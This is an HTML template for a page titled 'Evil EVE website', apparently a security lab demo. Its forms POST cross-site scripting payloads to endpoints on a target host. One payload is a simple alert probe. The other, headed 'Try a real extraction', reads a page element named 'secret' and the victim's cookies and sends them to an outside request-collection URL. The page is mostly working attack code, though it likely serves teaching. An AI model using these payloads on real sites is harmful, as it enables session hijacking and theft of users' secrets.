<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>Evil EVE website</title>
  </head>
  <body>
    <h1>This is an evil demo page</h1>
    <a href="hidden">Go to a less evil looking page</a>
    {% for endpoint in endpoints %}
        <h2>{{endpoint}}</h2>
        <form method="POST" action="https://bob-cloud-computing.tk/{{endpoint}}">
            <input type="text" style="width:100%" name="vulnerable" value="<script>function demo() {alert('XSS');} setTimeout(demo, 10)</script>"/>
            <input type="submit" value="Submit" />
        </form>
    {% endfor%}

    {% for endpoint in extract %}
        <h2>Try a real extraction on {{endpoint}}</h2>
        <form method="POST" action="https://bob-cloud-computing.tk/{{endpoint}}">
            <textarea style="width:100%; height: 15em" name="vulnerable">
<script>
    window.onload = function(e){
        var element = document.getElementById("secret");
        var secret = element.innerHTML;
        var cookie = document.cookie;
        var url = "https://requestbin.etnarek.com/13nfvyr1?secret=" + secret + "&cookie=" + cookie;
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open("GET", url, true);
        xmlHttp.send();

        alert("I have your secret : " + secret);
    }

</script>
            </textarea>
            <input type="submit" value="Submit" />
        </form>
    {% endfor%}

  </body>
</html>
